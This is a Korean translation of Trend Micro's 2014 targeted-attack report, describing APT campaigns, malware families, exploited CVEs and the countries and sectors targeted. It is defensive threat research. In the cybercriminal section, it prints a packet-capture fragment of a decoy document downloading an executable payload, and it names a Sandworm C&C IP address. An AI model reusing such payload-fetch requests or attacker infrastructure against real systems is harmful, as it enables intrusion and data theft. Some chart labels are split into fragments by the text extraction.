표적 공격 동향 - Trend Micro€¦ · 피티 타이거는 Pitty와 Paladin 원격 액세스...

TrendLabsSM Targeted Attack Campaign Report

표적 공격 동향2014년 연간 보고서

트렌드마이크로 법적 고지

본 문서에 포함된 정보는 교육을 목적으로 제공되는 일반적인

정보이며 법률적 조언으로서의 효력이 있는 것으로

해석되어서는 안됩니다. 본 문서의 정보는 모든 상황에 적용되지

않을 수 있으며 최신 상황을 반영하지 못할 수도 있습니다. 본

정보는 특정 사실이나 상황에 따른 법률적 조언 없이 활용하거나

실행에 옮겨서는 안되며 그 어떤 내용도 다르게 해석되어서는

안됩니다. 트렌드마이크로는 사전 고지 없이 언제라도 본 문서의

내용을 변경할 권한이 있습니다.

다른 언어로의 번역은 오로지 사용자의 편의를 위한 것이며

번역의 정확성은 보장하지 않습니다. 번역 정확성과 관련하여

궁금한 점이 있으시면 문서의 원본을 참조하십시오. 번역본에서

발생된 잘못된 내용이나 다른 내용은 법적 구속력이 없으며 준수

또는 실행을 강제할 법적 효력을 가지지 않습니다.

트렌드마이크로는 문서에 정확하고 최신 정보를 제공하기 위한

최선의 노력을 기울이기는 하지만 정확성, 현재성 또는 완전성과

관련하여 어떠한 보증도 하지 않습니다. 여러분은 이 문서의

사용에 대해 동의한 것이며 따라서 내용에 대한 위험도 여러분이

감수해야 하며 트렌드마이크로는 어떠한 암시적, 묵시적 보증도

제공하지 않습니다.

트렌드마이크로와 이 문서의 생성, 제작 또는 공급에 관여한

당사자는 이 문서의 사용 혹은 사용 불능, 내용의 오류나 누락

또는 이 문서로 인해 발생되는 모든 직접적, 간접적, 특수적,

결과적, 비즈니스 손실 또는 특별한 손해를 포함한 모든 결과,

손실 또는 손해에 대해 책임을 지지 않습니다. 이 정보를

사용하는 사람은 정보를 “있는 그대로”의 상태로 사용하는 것에

대해 동의한 것으로 간주됩니다.

Contents

5

9

11

17

21

25

References

31

28조직들은 표적 공격으로 인한 위험에 대응할 수 있어야 합니다.

표적 공격 기법의 도입으로 공격의 경계를 허물고 있는 사이버범죄자들

국제적 문제로 자리잡은 표적 공격.

검증된 기존 취약점과 새로운 제로데이 취약점이 꾸준히 공격에 악용되었습니다.

신기술을 활용하여 새로운 한계에 도전하는 표적 공격 전술

특수한 보안 설정으로 공격자의 활동을 막을 수 있는 것은 아닙니다.

표적 공격 캠페인을 실시한 특정 공격자/그룹을 파악하기가 어렵습니다.

서론

지능형 지속 공격(APT)라고도 불리는 표적 공격은 데이터 유출을 목적으로 하는 위협을 말합니다.

이 공격은 정보 수집, 진입점, C&C, 측면 확대(lateral movement), 자산/데이터 검색 및 데이터

유출과 같은 여섯 가지 단계로 구성되며 공격자가 네트워크 내에 공격의 발판을 마련해 놓을 수

있도록 허용하는 유지성(maintenance) 단계도 포함됩니다. 공격자는 먼저 표적의 프로필 정보를

수집하고 이를 딜리버리 메커니즘으로 이용하여 네트워크에 진입합니다. 공격자의 통제 하에서

손상된 시스템과 C&C 서버 간 통신이 구축되면 네트워크를 돌아다니며 유출시킬 기밀 파일들을

찾아낼 수 있습니다. 데이터 유출을 통해 조직의 핵심 정보가 공격자가 사전에 지정해 둔 장소로

전송됩니다.

이번 보고서에는 공격에 가담한 C&C 인프라에 대한 정보와 함께 트렌드마이크로가 2014년에

분석한 표적 공격의 사례들이 포함되어 있습니다. 다른 분야에서와 마찬가지로 조사 범위가

제한적이긴 하지만 우리가 확보한 정보를 통해 컴퓨팅 환경에 심각한 위협을 가하는 활동들의

특징을 이해할 수 있었습니다.

2014년, 우리는 정부 지원 공격과 비정부 지원 공격의 혼합된 형태를 발견하였습니다. 후자의

예로는 아리드 바이퍼 작전(Operation Arid Viper)과 피티 타이거(Pitty Tiger)가 있습니다.1

하지만 공격의 유형과 상관 없이 이들의 공통점은 정보 수집과 데이터 유출이었습니다. Amtrak의

사례에서처럼 공격의 표적이 된 조직의 내부자가 범인인 경우도 있습니다.2 공격자들은 대개 상용

도구와 소프트웨어를 표적으로 하지만 감시제어데이터 수집(SCADA) 시스템 솔루션에 대한

공격에서처럼 특수 목적의 어플리케이션을 공격하기도 합니다.3

공격자들은 탐지를 피하고 표적 네트워크 내에서 지속성을 유지하기 위해 전술을 한층

발전시켰습니다. 이러한 전술에는 Windows® PowerShell과 같은 합법적인 도구와 C&C

통신을 위한 Dropbox처럼 합법적인 플랫폼을 사용하는 방식도 포함되어 있습니다.

이러한 표적 공격 기술은 매우 효과적인 것으로 입증되었고 사이버범죄자들까지로 이를 활용하고

있습니다. 이로 인해 프레데터 페인(Predator Pain)과 리미트리스 (Limitless)에서처럼

사이버범죄자들의 피해자 범위가 한층 폭 넓어졌습니다.4

따라서 기업들은 표적 공격으로 인한 위험에서 벗어날 수 있는 더 우수한 전략과 더 효과적인

솔루션을 도입해야 합니다. 그리고 표적 공격 기법과 방식의 발전 속도에 뒤쳐지지 않아야 데이터

유출이 이루어지기 전에 공격을 차단할 수 있습니다.

—Ziv Chang

“표적 공격의 증가는 곧 표적공격이

개인과 조직에 대한 가장 심각한 보안

위협이 되었다는 것을 의미합니다.

새로운 감염 매개체와 멀웨어 기술

덕분에 공격자들은 표적 네트워크 내에

그들의 흔적을 남기지 않고 악의적

활동을 숨길 수 있었습니다.”

5 | 표적 공격 동향

표적 공격 캠페인을 실시한 특정 공격자/그룹을 파악하기가 어렵습니다.

표적 공격의 특성 상 공격자들은 표적 네트워크 내에 흔적을 남기지 않기 때문에 이들이 누구인지

파악하기가 매우 어렵습니다. 캠페인 배후 인물이 누구인지 상관 없이 모든 표적 공격은 정보 수집과

기밀 데이터 유출을 목적으로 합니다.

TREND MICRO | TrendLabs 2014 Targeted Attack Campaign Report


공격자들의 신원과 목적

ACTIVISTS

EX-EMPLOYEES

INSID

ERSCO

MPE

TITO

RS

STAT

E AC

TORS

WHO

WHYGATHER IN

TELSTEA

L SE

CRE

TS

FOR THE

CH

ALL

ENG

E

RETALIATION

SABO

TAGE

VICTIM NETWORK

TOP SECRET

정부 지원 공격

정부 지원(State-sponsored) 공격은 정치적 목적이나 산업 스파이 활동을 위해 특정 조직이나 국가를 표적으로 합니다.

표적 공격 캠페인과 관련이 있음을 알 수 있는 핵심 지표는 공격에 사용된 도구와 연구의 품질입니다. 정부 지원의

캠페인이라는 증거는 공격을 개시하기 위해 그들이 수집한 정보와 캠페인에 사용된 도구에 적용된 엔지니어링의 수준을

통해 확인되곤 합니다.

2007년부터 시작된 폰 스톰 작전(Operation Pawn Storm)은 배후자가 미국 및 동맹국가의 군 조직, 외교단, 방위청 및

언론 단체에 대한 정치적 경제적 스파이 활동을 목적으로 했기 때문에 정부 지원 공격으로 간주될 수 있습니다.5 이들의

표적에는 프랑스와 헝가리 국방부, 폴란드 공무원, 파키스탄 군 관리, 이라크의 바티칸 대사관 직원 및 미국 국무부가

포함되었습니다.

트렌드마이크로 사이버보안 책임자인 Tom Kellermann에 따르면, 점차 많은 공격자들이 파괴적인 공격 방식을 이용하며

활동 영역을 넓히고 있다고 합니다. 2013년 주요 공격자들의 활동 무대는 미국, 북한, 러시아, 중국, 베트남 및 인도였으며

2014년에는 시리아, 이란, 영국 및 프랑스에서도 활동하였습니다.



이라크의 바티칸 대사관 직원들에게 전송된 전자메일 샘플

From:

Subject:

Date:

To:

Reply-To:

Marcus Bipper

Terror Attack 01.10.12

October 3, 2012 at 3:05:30 AM PDT

폰 스톰 작전(Operation Pawn Storm)은 소셜 엔지니어링 낚시글을 이용한 것이 주효하였습니다. 배후 공격자는 “Inter-

national Military.rtf”란 이름의 익스플로잇이 가득한 첨부파일을 전자메일로 프랑스 국방부의 표적들에게

전송하였습니다. 이 외에도 이들은 “APEC.xls”이라는 제목의 악성 Microsoft™ Excel™ 첨부파일을 제작한 후 “

Asia-Pacific Economic Cooperation (APEC) Indonesia 2013”을 낚시글로 이용하여 군 관리들이 열어보도록

유도하였습니다. 또 다른 사례로, 이들은 2014년 7월 17일 발생한 비극적인 말레이시아 항공기 사건을 이용한 “MH17.-

doc”라는 악성 첨부파일을 폴란드 공무원들에게 전송하였습니다.

이렇게 특수 제작된 전자메일은 사용자들을 이름이 유사한 도메인으로 유도한 후 다른 표적 공격에 활용하기 위해 이들의

자격증명을 피싱하였습니다. 공격자들은 이와 동일한 목적으로 가짜 Microsoft Outlook® Web Access (OWA) 로그인

페이지를 이용하기도 하였습니다.6 후자의 경우, OWA를 통해 악성 메일을 미리보기 한 후 삽입된 유사 도메인을 클릭한

사용자들은 해당 뉴스 사이트로 이동되었습니다. 사용자들은 피싱 페이지로 이동시키는 교묘한 JavaScript 코드가 이

도메인에 첨부되어 있다는 사실을 몰랐습니다.

폰 스톰 작전(Operation Pawn Storm)은 다중요소 공격 전략을 사용했고 따라서 단일 요소만 분석해서는 전체 감염

체인을 파악할 수 없었기 때문에 분석가들은 모든 요소들을 살펴본 후에야 결론을 내릴 수 있었습니다.

IDF_Spokesperson_Terror_Attack_011012.doc



비정부 지원 공격

내부자에 의한 위협

조직들은 기업의 기밀 정보를 훔치거나 유출시켜 기존 직장으로 복귀하려는 악의적 의도를 가진 직원들에 의한 내부자

위협도 경계해야 합니다. 지난 해 발생한 Amtrak 정보 유출 사건은 조직 내부자에 의한 것으로 밝혀졌습니다. 이는 철도

회사에 근무했던 직원이 20년간의 승객 개인 식별 정보를 외부인에게 미화 854,460달러에 판매한 사건입니다. 일본에서도

계약자가 2천만 건의 파트너사 고객 개인 정보를 외부자에게 250만 엔에 판매한 유사한 사건이 발생했습니다. 8-9

악의적 내부자에 의한 위험과 손해를 효과적으로 처리하고 예방하기 위해선 정보 유출의 목적이 무엇인지를 이해해야

공격의 속성을 파악하는데 도움이 될 수 있습니다. 내부자에 의한 위협은 돈, 이념, 강압 또는 지나치게 높은 기대감에 기인할

수 있습니다. 조직 내에서 일어나는 위협은 기업의 기밀 정보가 악의적 의도를 가진 사람에게 유출될 경우 치명적인 손해를

입을 수 있습니다. 따라서 조직들이 조직 내/외부에서 일어나는 의심스러운 활동들을 탐지하기 위해선 데이터 전송을 비롯한

모든 활동들을 감시하고 기록해야 합니다.

2013년 중반부터 지속되어온 애리드 바이퍼작전(Operation Arid Viper)는 아랍과 긴밀한 관계가 있어 보이는 공격자에

의한 것으로 추정되었습니다. 정치적 목적의 공격이라고 해서 모두 정부의 주도로 이루어지는 것은 아닙니다. 자신의

신념이나 애국 단체를 대신하여 싸우는 핵티비스트들도 활동을 위한 재정적 기술적 지원을 받고 있습니다.

애리드 바이퍼 작전(Operation Arid Viper)의 배후자들은 이스라엘 정부 기관, 교육 기관, 운송업체 및 군 기관을 표적으로

하여 기밀 정보를 빼돌렸습니다. 이들은 표적 네트워크에 침입하기 위해 피싱 메일을 이용하였습니다. 이 전자메일은 특정

C&C 서버에 액세스하는 2단계 멀웨어와 함께 포르노 동영상 클립을 드롭하였습니다.

또 다른 사례로 “피티 타이거(Pitty Tiger)”라는 그룹이 실행한 비정부 지원 캠페인도 있습니다. 피티 타이거는 Pitty와

Paladin 원격 액세스 도구(RAT)을 포함하여 다양한 멀웨어와 도구를 사용했습니다. 보고서에 따르면, 이들의 C&C

인프라가 다양한 포르노 활동에 사용되었다고 합니다.7


특수한 보안 구성으로 공격자의 활동을 막을 수 있는 것은 아닙니다.

2014년에는 특수한 보안이 설정된 어플리케이션, 프로그램, 운영체제 및 설정으로도 공격자의 공격

시도를 막지 못했습니다. 2014년 10월 14일, 위협 연구원들은 산업 환경의 기기 모니터링 및 제어용

자동화 플랫폼인 GE Intelligent Platform의 CIMPLICITY를 공격 벡터로 활용한 공격 사례를

발견했습니다.



샌드웜(Sandworm) 팀의 C&C 서버를 감시하던 우리 연구원들은 CIMPLICITY용 객체 지향 파일인 “config.bak,”이라는

CimEdit/CimView 파일과 SCADA 시스템 자동화에 주로 사용되는 Basic Control Engine용 스크립트인 shell.bcl,

그리고 그 밖의 멀웨어가 들어있는 94.185.85.122를 찾아냈습니다.

Config.bak에는 “exec” “die”, ”getup” 및 “turnoff”와 같은 명령을 실행하는 악성 파일인 %Startup%\flashplayer-

app.exe를 드롭하라는 명령을 내린 두 건의 이벤트가 기록되어 있었습니다.

2014년에는 표적 네트워크에 침입하여 스파이 활동을 펼치기 위한 목적으로 Apple 기기들이 많은 공격의 표적이

되었습니다. 일례로 폰 스톰 작전(Operation Pawn Storm)에 두 개의 iOS 앱이 사용되었으며 이들은 트렌드마이크로가

IOS_XAGENT.A로 명명한 “Agent”와 IOS_XAGENT.B로 명명한 “MadCap”의 가짜 버전이었습니다.10 이들 두 파일은

키 입력을 기록하고 정보를 훔치는 SEDNIT와 관계가 있는 것으로 알려져 있습니다. 이 XAGENT 변종들은 피해자의 문자

메시지, 연락처 목록, 사진, 위치 데이터, 오디오 파일 및 설치된 앱 목록 등을 훔쳐내 HTTP POST를 통해 공격자들에게

전송하였습니다. 반면 IOS_XAGENT.B는 탈옥한 Apple 기기에서 오디오 레코더 역할만 수행합니다.

일부 표적 공격 그룹들은 일본과 한국을 표적으로 하기 위해 이치타로(Ichitaro)와 한컴 오피스와 같은 로컬 워드프로세싱

소프트웨어 취약점을 악용하기도 하였습니다.11-12


신기술을 활용하여 새로운 한계에 도전하는 표적 공격 방식

2014년에는 표적 공격 방식이 한층 발전하였습니다.



멀웨어 기법

•

•

•

•

오픈소스/무료 및 무기화 도구들이 교차 플랫폼 공격을 가속화시켰습니다. 일례로 Anunak 그룹은 네트워크 정찰을

위한 합법적인 네트워크 스캐너와 함께 HKTL_MIKATZ 형태의 다양한 오픈소스 익스플로잇을 사용하여 피해자의

자격 증명을 대거 수집하였습니다.13

제로 데이 익스플로잇은 포렌식 분석을 피하기 위해 위협을 모호하게 감추기 위한 방법으로 디스크리스(diskless)

멀웨어와 함께 사용되었습니다. 2014년 2월에는 Internet Explorer® 제로 데이 익스플로잇이 표적 공격에

사용되었습니다. 이 익스플로잇은 표적 시스템의 메모리에만 멀웨어를 심어놓는 방식으로 공격 지속성을

향상시켰습니다. 멀웨어/도구가 호스트를 성공적으로 감염시키면 로컬 네트워크에서 찾아낸 모든 IP 주소에 액세스할

수 있게 되며 호스트 역시 연결된 모든 시스템과 통신할 수 있게 됩니다.

TROJ_MDROP.TRX 로 명명된 문서 익스플로잇 템플릿 역시 표적 공격에 사용되었습니다.14 공격자들은 원하는

페이로드에 맞게 익스플로잇을 변경시켜야 합니다. 이 익스플로잇은 다양한 캠페인에서 사용될 수 있기 때문에 지하

시장에서 가장 많이 판매되었습니다. 라오스 부총리의 항공기 사고 기사를 낚시글로 이용한 사례도 있었는데 이

전자메일은 CVE-2012-0158을 악용하는 익스플로잇을 전송하였습니다.

마이크로소프트가 Window XP에 대한 지원 만료를 발표한 이후 조직들이 새로운 버전의 Windows로

업그레이드하게 되면서 64비트 멀웨어도 표적 공격에 사용되기 시작했습니다. 이러한 예로는 Poison RAT과 관계가

있는 KIVAR, 산업 제어 시스템을 표적으로 한 캠페인에 사용된 RAT인 HAVEX 그리고 Sony Pictures 해킹 공격

배후의 악명 높은 멀웨어인 WIPALL이 있습니다.15-17 다단계 감염이란 Regin과 애리드 바이퍼 작전(Operation Arid

Viper)처럼 공격의 여러 요소들을 이용하는 것을 말합니다. 일례로 Regin은 첫 번째 단계에서 “파일(A)”를 실행한 다음

“멀웨어 (B)”를 드롭합니다. 그 다음 단계에서 멀웨어 (B)를 실행하여 복사, 붙여넣기, 디코딩 또는 인코딩의 루틴을

진행합니다. 파일 (A)와 멀웨어 (B)는 서로 관련성이 있지만 다른 단계에서 실행되기 때문에 이들의 루틴은 의심을 받지

않고 정상적인 활동으로 간주될 수 있습니다.



NAME SHARE DESCRIPTION

IXESHE 21.14% Backdoor

MDROP 13.01% Trojan

PlugX 11.38% Backdoor

KIVARSLDR 11.38% Trojan

FARFLI 10.57% Backdoor

KIVARSENC 6.50% Trojan

KIVARS 5.69% Backdoor

MDLOAD 4.88% Trojan

POISON 4.07% Backdoor

DLOADER 2.44% Trojan

Others 8.94%

2014년 C&C 트래픽과 관련성이 가장 높은 멀웨어 패밀리

2014년 표적 공격에 가장 많이 사용된 멀웨어 패밀리

NAME SHARE DESCRIPTION

Gh0stRAT 18% Remote access Trojan

STRAT 18% Mass-mailing worm

XtremeRAT 5% Remote access Trojan

njRAT 5% Remote access Trojan

NFLog 4% Backdoor

DarkComet 4% Remote access Trojan

DUNIHI 3% Worm

RIMAGE 3% RAT

PASSVIEW 3% Hacking tool

EVORA 2% Backdoor

Others 33%

아래 표는 2014년 BKDR_IXESHE, TROJ_MDROP 및 BKDR_PLUGX가 주도한 표적 공격과 관련이 있는 멀웨어

패밀리입니다.

이 외에도 2014년에는 GhOstRAT와 STRAT이 주도한 C&C 트래픽과 관련된 멀웨어 패밀리도 확인하였습니다.



30

15

0

RTF

DOC

RAR

MIME

7-ZIP

MS PowerPoint 2007

MS Excel 95/97

PKZIP

Win32 EXE

PDF

JPEG

24%

22%

14%

8%7% 7% 7%

5%

3%2% 2%

우리가 조사한 자료에 의하면 .RTF와 .DOC파일이 전자메일 첨부파일로 가장 많이 사용되었으며 그 이유는 거의 모든

조직들이 Microsoft Word를 사용하기 때문인 것으로 추정됩니다.

2014년 표적 공격에 가장 자주 사용된 전자메일 첨부파일 유형

위협 전문가 견해

—Jay Yaneza

“세계는 아직 Windows XP에 대해 신중한 태도를 보이고 있지만, 최신

기술 도입에 앞서가는 사람들은 이미 64비트 하드웨어를 사용하고

있습니다. 개인 및 기업 사용자들도 대부분 64비트 버전을 실행하는

Windows 7이나 8로 이전하거나 이미 사용하고 있기 때문에

공격자들도 64비트를 수용하고 64비트형 공격을 시도하고 있습니다.

우리는 64비트 소프트웨어를 효과적으로 공략할 수 있는 도구와

멀웨어를 사용하는 공격자들을 확인하였으며 이러한 예가 바로 64

비트에서 실행되는 HAVEX, ANUNAK 및 PoS 멀웨어들입니다.”



—Tom Kellermann

“두드러진 동향 중 하나는 워터링 홀 공격과 아일랜드 호핑의

결합입니다. 이로써 이차 감염이 가능해지며 이러한 예로는 기업의 공급

체인이 표적이 되었을 때 공격자는 법률 회사 네트워크 외부로 빠져나가

선택한 웹 페이지를 워터링 홀로 전환시켜 멀웨어를 유포합니다.”

향상된 C&C 및 측면 확대 기법

공격자들은 다른 공격자들이 제작한 도구들을 재사용하였습니다. 이러한 예가 PlugX와 PoisonIvy이며 이들은 중국

공격자들이 처음 사용하였지만 그 이후 SK Communications 과 Cooper를 표적으로 한 공격을 위해 다른 그룹들이

사용하기도 하였습니다.18-19

공격자들은 서로 다른 방식들을 이용하여 통신하고 이를 암호화하며 C&C 통신을 위해 인터넷에 연결된 호스트를

감염시키기 보다는 병렬 감염된(parallel infected) 호스트를 사용합니다. 그리고 이들은 C&C 통신을 위해 상용 및

공용 VPN을 사용합니다. 악성 네트워크 트래픽을 숨기고 표적 네트워크에서 지속성을 유지하기 위해 Tor가 주로

사용되었습니다. BIFROSE 변종들은 종종 이러한 루틴을 자주 사용했으며 특히 C&C와의 통신을 위해 Tor를

사용하는 BKDR_BIFROSE.ZTBG-A를 주로 사용했습니다.20

대만 정부 기관에 대한 표적 공격에서는 공격자가 PlugX RAT 변종을 사용했는데 이는 Dropbox를 드롭존으로 활용할

수 있도록 허용하며21 이 루틴은 탐지를 회피합니다.

2014년에는 시스템 관리자가 GUI 를 사용하지 않고도 다른 기능에 액세스할 수 있도록 허용하는 Windows 7 및 그

이후 버전의 PowerShell 기능이 많은 공격에 노출되었습니다. PowerShell 명령은 악성 파일을 다운로드받고 실행

정책을 우회하는데 악용되었고 이로 인해 악성 파일이 실행될 수 있었으며 이 루틴으로 인해 IT 관리자는 의심스러운

활동을 눈치채지 못했습니다.

이 외에도 공격자들은 패칭이 예정된 취약점을 악용하고 스테가노그래픽을 적용시켜 시스템 정리가 이루어진 이후에도

시스템상에 남아있을 수 있으며 보조 C&C 서버를 백업으로 이용하여 장기 수면 상태를 유지했습니다.




•

•

데이터 유출 기술

공격자들은 데이터 유출을 위해 OneDrive™, Google Drive™, Dropbox, Baidu Cloud Network Drive, Gmail™,

Plurk, Facebook, Twitter, Evernote 및 Pastebin와 같은 합법적인 클라우드 스토리지 서비스를 악용하였습니다.

이 때, 탐지를 피하고 간편한 전송을 위해 훔친 데이터를 합법적인 플랫폼에 잠시 보관합니다.

피해자의 웹 및 FTP 서버와 포털을 이용한 사례와 데이터 유출을 위해 기존의 C&C 서버를 지속적으로 사용한 사례도

확인되었습니다.


검증된 기존 취약점과 새로운 제로 데이 취약점이 꾸준히 공격에 악용되고 있습니다.

기존의 취약점 대신 새로운 취약점을 악용할 경우 보안 업체들이 아직 패치를 제작하기 전이라 더

효과적인 것으로 입증되었습니다. 제로데이 익스플로잇은 보안 업체와 피해자의 허를 찌를 수 있으며

기존 취약점을 악용할 경우 공격자는 구매하기가 용이한 검증된 익스플로잇을 사용할 수 있다는 점에서

안정적인 것으로 나타났습니다.



EXPL_MSCOMCTL.A

EXPL_CVE20120158

HEUR_RLOTRICK.A

HEUR_RTFMALFORM

EXPL_CVE20141761

EXPL_CVE2014411

HEUR_OLEXP.A

Others

45%

10%

8%

7%

7%

6%

4%

11%

설명점유율탐지명

EXPL_MSCOMCTL.A 45%

EXPL_CVE20120158 10%

HEUR_RLOTRICK.A 8%

HEUR_RTFMALFORM 7%

EXPL_CVE20141761 7%

EXPL_CVE20144114 6%

HEUR_OLEXP.A 4%

HEUR_OLEXP.X 3%

HEUR_RTFEXP.A 3%

HEUR_NAMETRICK.A 1%

HEUR_PDFEXP.A 1%

EXPL_CVE20093129 1%

HEUR_RLOTRICK.B 1%

EXPL_CVE20146352 1%

2014년 처리된 표적 공격용 취약점 탐지 사례

ActiveX가 MSCOMCTL을 제어할 때 시스템 상태를 손상시킴.TreeView, MSCOMCTL.ListView2, MSCOMCTL.TreeView2 및 MSCOMCTL.ListView가 Internet Explorer에서 활성화되고 이로 인해 임의 코드가 실행됨. PLEAD 캠페인 관련 표적 공격에서 발견됨. MS12-027로 패치됨.

CVE-2014-1761(제로데이) 악용, 대만 정부 기관에 대한 표적 공격에서 발견됨, MS14-017으로 패치됨.

액세스 권한을 가진 사용자가 임의 코드를 실행할 수 있도록 허용하는 Excel 취약점을 표적으로 함; MS09-067로 패치됨

CVE-2014-6352를 악용; MS14-064로 패치됨

RTLO 기술을 이용하며 암호로 보호된 압축 파일

의심스러운 JavaScript 개체가 포함된 기형 .PDF 파일

의심스러운 확장자를 가진 파일

의심스러운 파일 페이로드

.XLS 파일에 삽입된 의심스러운 암호화 개체

대용량의 의심스러운 .OLE 파일

Sandworm/Black Energy 공격에 사용됨; MS14-060으로 패치됨

의심스러운 구문 포함

확장자 변조 취약점(RTLO) 기법을 이용하는 압축 PE(portable executable) 파일

의심스러운 ActiveX 개체



•

•

•

•

기존 취약점

공격자들은 MS12-027를 통해 패치되었음에도 불구하고 Windows Common Controls의 취약점인 CVE-2012-0158

를 계속 악용하였습니다. PLEAD와 폰 스톰 작전(Operation Pawn Storm)의 배후자들은 이를 악용하여 표적 네트워크에

침입하였습니다. 대만 정부 기관을 표적으로 한 PLEAD는 RTLO 기법을 이용하여 사용자들로 하여금 PowerPoint 파일을

가장한 악성 .SCR 파일을 열도록 유인하는 것으로 악명이 높습니다.26

제로데이 익스플로잇

CVE-2014-1761을 표적으로 한 두 건의 Taidoor 관련 제로데이 익스플로잇 공격이 대만의 정부 및 교육 기관을

강타하였습니다(공격 노출 기간:15일).22

마이크로소프트가 Windows XP에 대한 지원을 종료하자 지금은 MS14-021로 이미 패치된 심각한 취약점이 악명을

떨치게 되었습니다.23 이로 인해 업체는 성명을 철회하고 패치를 발표하게 되었습니다(공격 노출 기간:15일).

Sandworm 취약점(CVE-2014-4114) 기사가 발표된 이후 마이크로소프트가 즉각적으로 패치를 발표했습니다.

(공격 노출 기간: 없음) 24

2014년 10월 마이크로소프트는 악성 Office® 파일을 악용할 수 있는 CVE-2014-6352용 신종 제로데이

익스플로잇을 발견했다고 발표했습니다.25 실제로 실행된 공격들은 PowerPoint® 프레젠테이션을 특수

제작하였습니다(공격 노출 기간:21일).

2014년에는 표적 공격에 다음과 같은 제로 데이 익스플로잇이 사용된 사실도 확인하였습니다.



반면 폰 스톰 작전(Operation Pawn Storm)은 스피어피싱 전자메일에 첨부된 Word 문서를 가장한 익스플로잇을

사용하였습니다. 이 공격의 배후자는 2014년 상반기에 발생한 표적 공격들과 관련하여 가장 많이 이용된 취약점인

CVE-2012-0158을 악용하였습니다.

PLEAD나 폰 스톰 작전(Operation Pawn Storm) 외에 EvilGrab 멀웨어도 CVE-2012-0158을 악용하였습니다.27

PLEAD 캠페인에 사용되었으며 .DOC 파일로 가장한 악성 .SCR 파일


국제적 문제로 자리잡은 표적 공격.



Algeria

Australia

Brazil

Canada

China

France

Germany

Ghana

India

Indonesia

Italy

Japan

Malaysia

Singapore

South Korea

Taiwan

Turkey

United Kingdom

United States

Vietnam

2014년 표적 공격 C&C 서버와 통신한 국가들

위협 감시 활동의 일환으로 우리는 C&C 서버에 접속하는 표적들의 분포도 및 C&C 서버와 통신하는 감염된 호스트의

근거지를 확인하였습니다. 아래의 히트맵에서 볼 수 있듯이 다양한 국가의 표적들이 표적 공격의 C&C 서버에

액세스하였으며 공격자들이 선호하는 대상은 더 이상 미국, 러시아, 중국에만 한정되지 않습니다.



2014년 표적 공격 관련 C&C 서버를 호스팅한 국가들

Australia

Brazil

China

Egypt

Germany

Hong Kong

Indonesia

Ireland

Netherlands

Russia

Singapore

South Korea

Taiwan

United States

2014년에 확인된 사례를 보면, 표적 공격과 연관이 있는 C&C 서버를 호스팅한 국가 목록에 호주, 브라질, 중국, 이집트 및

독일이 상위를 차지하였습니다. 하지만 C&C 서버는 원격 액세스가 가능하기 때문에 아래의 국가에 거주하지 않는

공격자들도 공격을 실행할 수 있습니다.



Government

Industrial

Computer

Telecommunications

Aerospace

Electrical

Military

Aviation

Financial

Health care

78%

5%

4%

4%

2%

2%

2%

1%

1%

1%

Government

Electronics

Computer

Industrial

Health care

Aerospace

Financial

Military

74%

10%

6%

4%

3%

1%

1%

1%

1H 2014 2H 2014

AEROSPACE

AVIATION

COMPUTER

ELECTRONICS

INDUSTRIAL

MILITARY

TELECOMMUNICATIONS

HEALTHCARE

ELECTRICAL

GOVERNMENT

FINANCIAL

2014년에도 공격자들이 가장 선호하는 표적은 정부 기관이었지만 하반기에는 하드웨어/소프트웨어 회사, 가전제품

제조사, 의료 기관을 표적으로 한 공격도 크게 증가하였습니다.

2014년 상반기와 하반기에 표적 공격을 받은 산업 부문 분포도의 변화

2014년 상반기와 하반기에 표적 공격을 받은 산업 부문 분포도


사이버범죄자들은 재정적 수익을 높이는데 효과적인 것으로 입증된 표적 공격 관련 기술들을

도입하였습니다. 일례로, 프레데터 페인(Predator Pain)과 리미트리스(Limitless)의 배후자들은

개인이 아닌 중소기업을 표적으로 하였고 6개월 만에 미화 7천5백만 달러를 벌어들였습니다.

표적 공격 기법의 도입으로 공격의 경계를 허물고 있는 사이버범죄자들



. 8.21/gre/tan.exe]

Get /gre/tan.exe HTTP/1.1\r\n

Accept: */*\r\n

Accept Encoding: gzip, deflate\r\n

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.OC; Infopath.2)\r\n

Host:

Connection: Keep.Alive\r\n

\r\n

[Full request URI: http://

[HTTP request 1/1]

[Response in frame: 7]

. 8.21\r\n

Decoy(미끼) 문서를 열었을 때 실행되는 코드

또 다른 사례에서는 널리 이용되는 취약점을 악용한 두 개의 Word 문서가 사용되었습니다. 이들 문서에는 마지막

페이로드가 BKDR_NEUREVT.SMA라는 백도어인 매크로가 첨부되어 있으며 이는 감염된 시스템의 운영체제, 하드웨어

사양, 보안 및 FTP 소프트웨어, 메시징 어플리케이션을 사이버범죄자들에게 보고합니다. 공격자는 손상된 사이트를 C&C

서버로 이용하기도 하였습니다.

공격자들은 프레데터 페인(Predator Pain)이나 리미트리스 키로거(Limitless keylogger)가 첨부파일 형태로 첨부된

업무관련 메시지를 외부에 공개된 기업 전자메일 주소로 전송하였습니다. 키로거를 통해 브라우저에 캐시된 온라인 계정

자격증명과 저장된 채팅 메시지 및 전자메일을 확보하여 이를 더 악의적 용도로 활용할 수 있었습니다. 이 외에도 공격자는

피해자의 비즈니스 파트너에게도 전자메일을 전송하여 더 규모가 큰 표적을 공격할 수도 있었습니다.

선임 위협 연구원인 Loucif Kharouni는 사이버범죄자들이 표적 공격 방식으로 활용할 수 있는 다양한 방법들을

조사하였습니다. 일례로 Arablab의 경우 사이버범죄자들은 자신들의 악의적 의도를 감추기 위해 미끼(decoy) 문서를

사용하였습니다.28 이 문서를 열면 스크립트가 배후에서 조용히 실행되어 악성 사이트에 액세스하고 피해자의 온라인 뱅킹

자격 증명을 훔치는 Citadel 멀웨어를 드롭합니다. Arablab은 표적 공격 전술과 함께 다양한 익스플로잇, RAT 및 뱅킹

트로얀을 사용하였습니다.



—Loucif Kharouni

“공격 방식은 크게 변화하지 않았음에도 표적 공격이 활발해진 것을 통해

유사한 위협들이 널리 사용되고 있다는 것을 알 수 있습니다. 이러한

공격은 효과적이기 때문에 널리 사용되는 것이며 공격자의 목적과 전략은

간단히 말해 도움이 되는 것이라면 가리지 않고 도입하는 것입니다.”



일반적으로 표적 공격은 선형 반복되지 않는다고 생각하지만 이는 사실이 아닙니다. 표적 공격의 각

요소는 네트워크에 보다 깊숙이 침투하기 위한 별개의 단계나 목표를 가지고 있습니다. 하지만 이

요소들은 각 활동의 성공 여부와 수집한 정보의 품질이 공격을 진행하는데 충분한 지 여부에 따라

반복적으로 실행될 수 있습니다.

조직들은 표적 공격으로 인한 위험에 대응할 수 있어야 합니다.



1

23

4

5

6

1 2 4 5 63

